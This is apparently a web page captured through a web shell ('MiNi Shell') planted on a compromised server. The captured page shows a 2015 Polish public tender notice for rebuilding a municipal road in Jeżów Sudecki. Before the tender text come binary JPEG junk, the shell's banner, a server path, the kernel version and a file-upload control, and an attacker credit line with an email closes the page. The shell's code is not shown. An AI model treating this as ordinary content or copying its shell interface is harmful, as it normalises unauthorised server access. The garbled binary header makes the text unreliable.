JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150212/31854-N-2015.html

<p class="kh_header"><b>Jeżów Sudecki: PRZEBUDOWA DROGI GMINNEJ W GÓRNYM DZIWISZOWIE.</b><br>
<b>Numer ogłoszenia: 31854 - 2015; data zamieszczenia: 12.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jeżów Sudecki , ul. Długa 63, 58-521 Jeżów Sudecki, woj. dolnośląskie, tel. 757 132 254, -255, -257, faks 757 132 254, -255, -257.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jezowsudecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA DROGI GMINNEJ W GÓRNYM DZIWISZOWIE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Droga gminna w górnym Dziwiszowie zaplanowana do przebudowy zlokalizowana jest w północnej części miejscowości i przebiega od skrzyżowania z drogą wojewódzką nr 365 relacji Jelenia Góra - Jawor w kierunku północnym w stronę Łysej Góry na której usytuowana jest stacja sportów zimowych. Droga ta wraz ze swoimi odnogami stanowi dojazd do posesji i pól usytuowanych w północnej części Dziwiszowa. Droga w głównym jej ciągu ma nawierzchnię bitumiczną, która obecnie jest w złym stanie technicznym i wymaga przebudowy. Występują na niej liczne spękania siatkowe z wykruszeniami, deformacje, zapadnięcia oraz ubytki. Na odnogach drogi, które stanowią dojazdy do gospodarstw rolnych i dalej do pól jest nawierzchnia gruntowa, która posiada koleiny, liczne wyrwy oraz ubytki spowodowane rozmyciem przez spływające na dużych spadkach podłużnych wody opadowe. Istniejące odwodnienie drogi w postaci ścieków, rowów i przepustów jest w złym stanie technicznym. Przepusty pod drogą i na zjazdach w większości są pozałamywane i zamulone, a ich zbyt małe średnice nie przepuszczają wód opadowych, które przy nawalnych opadach deszczu nie mieszcząc się w przepustach i rowach rozmywają koronę drogi.
Taki stan powoduje częste zalewanie posesji i pól przyległych do drogi, niszczy nawierzchnię jezdni oraz stanowi utrudnienia ruchu pojazdów i pieszych co stwarza zagrożenie bezpieczeństwa jej użytkowników. Aby droga spełniała warunki bezpiecznej eksploatacji należy wykonać jej przebudowę polegającą na wykonaniu nowej nawierzchni i konstrukcji jezdni oraz przebudowie elementów odwodnienia.

PARAMETRY PROJEKTOWANEJ DROGI 
- długość drogi  							        - 2084 m  w tym:
		- odcinek AAl						- 1150 m 
		- odcinek BBl						- 93 m
		- odcinek CCl						- 85 m  
		- odcinek DDl						- 304 m
		- odcinek EEl						- 366 m
		- odcinek FFl						- 86 m
- szerokość jezdni bez zatok i poszerzeń				- 2,5 - 5,0 m  
- powierzchnia jezdni z betonu asfaltowego			- 8044,0 m2  
- krawężniki betonowe 15x30x100cm				- 74,0 m  
- krawężniki betonowe 15x22x100cm najazdowe			- 2903,0 m  
- ścieki i nawierzchnie z kostki kamiennej 9/14cm		- 263,2 m2  
- ścieki z elementów prefabr. 60x50x15cm				- 507,0 m  
- ścieki z elementów prefabr. 50x50x15cm				- 463,0 m  
- odtworzenie i profilowanie rowów				        - 984,0 m  
- przepusty z rur PEHD fi 400mm					- 34,0 m  
- przepusty z rur PEHD fi 500mm					- 21,0 m  
- przepusty z rur PEHD fi 600mm					- 47,0 m  
- przepusty z rur PEHD fi 800mm					- 11,0 m  
- przepusty z rur PEHD fi 1000mm					- 25,0 m  
- przykanalik  fi 200mm						        - 107,0 m  
- przykanalik  fi 250mm						        - 26,0 m  
- przykanalik  fi 300mm						        - 84,0 m  
- mury oporowe z kamienia łamanego granitowego		- 150,6 m3
- bariery ochronne stalowe SP-06					- 116 m
- spadki  podłużne							- do 15,0 %
- spadki  poprzeczne                     				- 1 ÷ 3 %
- ruch								        -  KR1 - KR2.

ROZWIĄZANIA  PROJEKTOWE
Konstrukcja  jezdni
Na podstawie dokonanych uzgodnień oraz w oparciu o wyniki dokonanych pomiarów sytuacyjno-wysokościowych zaprojektowano następującą konstrukcję  jezdni:
-   jezdnia na odcinku AAl, BBl, CCl, DDl, EEl i FFl , zjazdy, zatoki, na nowej podbudowie:
-  warstwa dolna podbudowy z kruszyw łamanych 0/63 mm grubości 15 cm;
-  warstwa górna podbudowy z kruszyw łamanych 0/31,5 mm grub. 8 cm;
- skropienie asfaltem podbudowy  w ilości 0,7 kg/m2;
- wyrównanie i wzmocnienie podbudowy mieszanką mineralno - bitumiczną asfaltową  w ilości średnio 150 kg/m2; 
-  wykonanie warstwy ścieralnej nawierzchni z betonu asfaltowego -  
    AC11S o grubości 4 cm;
-   jezdnia na poszerzeniach, na odcinku AAl, EEl, i zjazdy bitumiczne istniejące:
- oczyszczenie istniejącej nawierzchni;
- frezowanie uszkodzonej i zdeformowanej istniejącej nawierzchni bitumicznej;
- Podbudowa z gruntu stabilizowanego cementem w ilości 25 kg/m2 
   (warstwą stabilizującą Rm=2,5 Ma) grubości 15 cm;
-  Warstwa dolna podbudowy z kruszyw łamanych 0/63 mm grubości 15 cm;
-  Warstwa górna podbudowy z kruszyw łamanych 0/31,5 mm grub. 8 cm;
- skropienie asfaltem podbudowy  w ilości 0,7 kg/m2;
- wyrównanie i wzmocnienie podbudowy mieszanką mineralno - bitumiczną asfaltową w ilości średnio 150 kg/m2; 
-  wykonanie warstwy ścieralnej nawierzchni z betonu asfaltowego -  
    	AC11S o grubości 4 cm;
-   jezdnia nad przepustami w drodze:
- Podbudowa z gruntu stabilizowanego cementem w ilości 25 kg/m2 (warstwą stabilizującą Rm=2,5 Ma) grubości 15 cm;
-  Warstwa dolna podbudowy z kruszyw łamanych 0/63 mm grubości 15 cm;
-  Warstwa górna podbudowy z kruszyw łamanych 0/31,5 mm grub. 8 cm;
- skropienie asfaltem podbudowy  w ilości 0,7 kg/m2;
- wyrównanie i wzmocnienie podbudowy mieszanką mineralno - bitumiczną asfaltową w ilości średnio 150 kg/m2; 
- wykonanie warstwy ścieralnej nawierzchni z bet. asfalt. -  AC11S o gr. 4 cm.
Odwodnienie
	W celu prawidłowego odwodnienia nawierzchni jezdni i przyległego terenu przyjęto w projekcie:
- ustawienie krawężników betonowych 15x30 cm i najazdowych 15x22 cm ułożonych na ławie oporowej z betonu C12/15 w celu prowadzenia wody do studni ściekowych i ochrony krawędzi jezdni;
- wykonanie ścieków z elementów prefabrykowanych 60x50x15cm i 50 x50x15cm na ławie z betonu gr. 15cm z bet. C12/15;
-  ułożenie ścieków, poboczy, opasek z kostki kamiennej 9-14cm na ławie gr. 20cm z bet. C12/15 na wyznaczonych odcinkach, wzdłuż krawędzi jezdni (ścieki szer. 60cm), założono także brukowanie powierzchni wokół studzienek ściekowych i na wylotach przykanalików do rowów oraz w miejscach włączenia ścieków betonowych do rowów;
-   wymianę przepustów pod drogą i zjazdami ze względu na ich zły stan z rur PEHD fi 400, 500, 600, 800, 1000mm.
- ułożenie lub wymiana przykanalików z rur PVC fi 200, 250, 300mm od projektowanych studni ściekowych fi 500mm do studni rewizyjnych i rowów;
-  wykonanie studni ściekowych fi 500mm z wpustem żeliwnym uchylnym;
-  wykonanie studni rewizyjnej fi 1000mm z włazem żeliwnym;
-wykonanie, odtworzenie i profilowanie istniejących rowów z wyprofilowaniem skarp    i  dopasowaniem  niwelety  dna  do  ścieków i wlotów  przepustów.
Należy opracować w porozumieniu z Zamawiającym: 
- projekt tymczasowej organizacji ruchu na potrzebę wykonania przedmiotu zamówienia i przedłożyć Zamawiającemu w terminie 10 dni od dnia podpisania umowy, 
- projekt organizacji ruchu po zakończonych robotach wraz z niezbędnymi opiniami właściwych instytucji i przedłożyć w siedzibie Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości

40.000,00 PLN słownie: czterdzieści tysięcy złotych

2. Wadium może być wniesione w następujących formach:
a pieniądzu
b poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej  z tym, że poręczenie kasy jest zawsze zobowiązaniem pieniężnym,
c  gwarancjach bankowych,
d  gwarancjach ubezpieczeniowych,
e poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 09 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości tekst jednolity z 2007 r. Dz. U. Nr 42, poz. 275, z późniejszymi zmianami.
3. W przypadku składania przez wykonawcę wadium w formie gwarancji - gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a nazwę dającego zlecenie wykonawcy), beneficjenta gwarancji Zamawiającego tj. Gminy Jeżów Sudecki, gwaranta  banku lub instytucji ubezpieczeniowej udzielających gwarancji  oraz wskazanie ich siedzib,
b określenie wierzytelności, która ma być zabezpieczona gwarancją,
c kwotę gwarancji,
d termin ważności gwarancji,
e zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie :
- że wykonawca, w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy P.z.p. nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy P.z.p., lub pełnomocnictw, a nie udowodnił, że nie wynikało to z przyczyn leżących po jego stronie 
lub
- że wykonawca, którego ofertę wybrano:
-  nie podpisał umowy na warunkach określonych w ofercie, lub
-  nie wniósł zabezpieczenia należytego wykonania umowy, lub
-  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
Postanowienia pkt. 3. stosuje się również do poręczeń, określonych w pkt. 2.b i 2.e.
4. Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem - na rachunek Zamawiającego, otwarty w PLN : Bank PKO BP SA Oddział Jelenia Góra , numer: 
74 1020 2124 0000 8802 0011 1419, z adnotacją w tytule wpłaty 
Wadium- Przebudowa drogi gminnej w Górnym  Dziwiszowie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin obowiązywania gwarancji - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jezowsudecki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Długa 63, 58-521 Jeżów Sudecki, I piętro, pok. 107.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2015 godzina 09:00, miejsce: ul. Długa 63, 58-521 Jeżów Sudecki, I piętro, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com